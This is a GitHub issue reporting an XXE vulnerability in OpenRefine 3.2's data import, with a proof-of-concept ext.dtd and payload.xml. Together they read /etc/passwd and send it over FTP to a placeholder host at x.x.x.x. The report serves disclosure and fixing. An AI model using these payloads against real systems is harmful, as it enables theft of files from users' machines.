Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Describe the bug OpenRefine 3.2 (and below) has a XXE vulnerability, that can be triggered through a data import. It is possible to steal data from an OpenRefine user.
Please consider disabling external DTDs.
To Reproduce See the video (zipped because of GH file extension restrictions) xxe.zip
Current Results File content is send over FTP, no feedback is shown to the user.
Desktop (please complete the following information): Tested on (desktop version is not important)
$ java -version openjdk version "1.8.0_192" OpenJDK Runtime Environment (build 1.8.0_192-b26) OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)
OpenRefine (please complete the following information):
Datasets ext.dtd
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:5555/%d;'>">
payload.xml
<?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]> <a>&rrr;</a>
Additonal info Sorry that i was a bit inactive during the last issue :).
The text was updated successfully, but these errors were encountered:
6a0d7d5
wetneb
No branches or pull requests
Describe the bug
OpenRefine 3.2 (and below) has a XXE vulnerability, that can be triggered through a data import. It is possible to steal data from an OpenRefine user.
Please consider disabling external DTDs.
To Reproduce
See the video (zipped because of GH file extension restrictions) xxe.zip
Current Results
File content is send over FTP, no feedback is shown to the user.
Desktop (please complete the following information):
Tested on (desktop version is not important)
OpenRefine (please complete the following information):
Datasets
ext.dtd
payload.xml
Additonal info
Sorry that i was a bit inactive during the last issue :).
The text was updated successfully, but these errors were encountered: